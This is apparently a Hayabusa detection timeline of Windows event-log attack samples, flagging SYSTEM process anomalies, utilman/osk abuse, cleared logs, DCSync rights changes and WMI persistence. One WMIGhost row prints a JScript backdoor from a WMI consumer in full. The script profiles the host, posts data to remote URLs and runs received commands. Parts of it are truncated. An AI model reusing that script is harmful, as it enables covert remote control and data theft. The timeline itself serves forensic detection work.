Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent 
Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 365ABB72-7874-5C91-0000-0010130B0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: 
C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 365ABB72-78B1-5C91-0000-001001300200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | 
User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 
365ABB72-78D2-5C91-0000-0010FFAB0200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 365ABB72-78D6-5C91-0000-0010CE170300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 
365ABB72-78EE-5C91-0000-0010273F0400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media 
Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 365ABB72-79FC-5C91-0000-0010DBC60A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:24:08.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_104_system_log_cleared.evtx +2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx +2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 365ABB72-F76A-5CA4-0000-0010FA0D1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var 
MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var 
container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,../hayabusa-rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 
